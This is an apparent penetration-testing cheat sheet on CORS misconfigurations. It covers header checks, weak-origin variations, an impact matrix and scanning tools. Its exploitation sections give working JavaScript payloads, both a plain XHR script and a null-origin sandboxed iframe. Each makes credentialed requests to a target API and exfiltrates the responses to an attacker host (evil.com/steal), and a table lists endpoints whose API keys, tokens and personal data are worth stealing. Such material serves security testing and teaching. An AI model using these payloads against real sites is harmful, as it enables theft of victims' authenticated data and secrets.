CORS Misconfiguration

Overview

Cross-Origin Resource Sharing (CORS) controls which origins can access resources. Misconfigured CORS headers allow attacker’s site to read responses from victim’s authenticated session.

Key Headers

Header	Description
`Access-Control-Allow-Origin`	Allowed origin
`Access-Control-Allow-Credentials`	Allow cookies/auth
`Access-Control-Allow-Methods`	Allowed HTTP methods
`Access-Control-Allow-Headers`	Allowed headers
`Access-Control-Expose-Headers`	Headers readable by JS
`Access-Control-Max-Age`	Preflight cache time

Detection

Check Headers

curl -s -I -H "Origin: https://evil.com" https://TARGET/api/user

Look for:

Access-Control-Allow-Origin: https://evil.com
Access-Control-Allow-Credentials: true

If your origin is reflected back with credentials → exploitable.

Variations to Test

# Reflected origin
curl -s -I -H "Origin: https://evil.com" TARGET

# Null origin
curl -s -I -H "Origin: null" TARGET

# Subdomain
curl -s -I -H "Origin: https://sub.TARGET" TARGET

# Prefixed domain
curl -s -I -H "Origin: https://TARGETevil.com" TARGET

# Suffixed domain
curl -s -I -H "Origin: https://evil-TARGET" TARGET

Vulnerable Configurations

1. Origin Reflection

Server reflects any Origin header back.

Request:  Origin: https://evil.com
Response: Access-Control-Allow-Origin: https://evil.com
          Access-Control-Allow-Credentials: true

2. Null Origin Allowed

Request:  Origin: null
Response: Access-Control-Allow-Origin: null
          Access-Control-Allow-Credentials: true

Triggered from sandboxed iframes, data URIs, local files.

3. Weak Regex

Server checks if origin contains target domain:

evil.com.TARGET.com     → Allowed (prefix match)
TARGET.evil.com         → Allowed (contains target)
TARGETevil.com          → Allowed (substring match)

4. Wildcard with Credentials

Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true

Browsers block this combo, but some frameworks handle it incorrectly.

5. Pre-Domain Wildcard

*.TARGET.com → Any subdomain allowed

If attacker has XSS on any subdomain → can exploit CORS.

Exploitation — Origin Reflection

<script>
var req = new XMLHttpRequest();
req.onload = function() {
    // Send victim's data to attacker
    fetch('https://evil.com/steal?data=' + encodeURIComponent(this.responseText));
};
req.open('GET', 'https://TARGET/api/user', true);
req.withCredentials = true;
req.send();
</script>

Host on https://evil.com → victim visits → their authenticated data sent to attacker.

Exploitation — Null Origin

<iframe sandbox="allow-scripts allow-top-navigation allow-forms"
  src="data:text/html,<script>
    var req = new XMLHttpRequest();
    req.onload = function() {
      fetch('https://evil.com/steal?data=' + encodeURIComponent(this.responseText));
    };
    req.open('GET', 'https://TARGET/api/user', true);
    req.withCredentials = true;
    req.send();
  </script>">
</iframe>

Sandboxed iframe sends Origin: null.

Exploitation — Subdomain Takeover + CORS

If *.TARGET.com is allowed and an unused subdomain exists:

Take over unused.TARGET.com (dangling CNAME, cloud service)
Host exploit on unused.TARGET.com
CORS allows it → read authenticated responses

Data to Steal

Endpoint	Data
`/api/user`	PII, email, role
`/api/account`	Account details, API keys
`/api/settings`	Config, tokens
`/api/admin`	Admin data
`/api/keys`	API keys, secrets

Automation

Nuclei

nuclei -t http/vulnerabilities/cors/ -l urls.txt

Manual Script

while read url; do
    origin=$(curl -s -I -H "Origin: https://evil.com" "$url" | grep -i "access-control-allow-origin")
    creds=$(curl -s -I -H "Origin: https://evil.com" "$url" | grep -i "access-control-allow-credentials")
    if [[ "$origin" == *"evil.com"* ]] && [[ "$creds" == *"true"* ]]; then
        echo "[VULN] $url"
    fi
done < urls.txt

Corsy

# https://github.com/s0md3v/Corsy
python3 corsy.py -u https://TARGET
python3 corsy.py -i urls.txt -t 20

Impact Matrix

Config	Credentials	Impact
Reflected origin	true	Critical — full data theft
Null allowed	true	High — iframe exploitation
Weak regex	true	High — register lookalike domain
Wildcard `*`	false	Low — no auth data accessible
Subdomain wildcard	true	Medium — needs subdomain XSS/takeover

Quick Reference

Test	Command
Check reflection	`curl -I -H "Origin: https://evil.com" TARGET`
Check null	`curl -I -H "Origin: null" TARGET`
Exploit	Host JS that reads `/api/user` with `withCredentials`
Tool	`corsy.py -u TARGET`

Documentation Index

​Overview

​Key Headers

​Detection

​Check Headers

​Variations to Test

​Vulnerable Configurations

​1. Origin Reflection

​2. Null Origin Allowed

​3. Weak Regex

​4. Wildcard with Credentials

​5. Pre-Domain Wildcard

​Exploitation — Origin Reflection

​Exploitation — Null Origin

​Exploitation — Subdomain Takeover + CORS

​Data to Steal

​Automation

​Nuclei

​Manual Script

​Corsy

​Impact Matrix

​Quick Reference

​Sources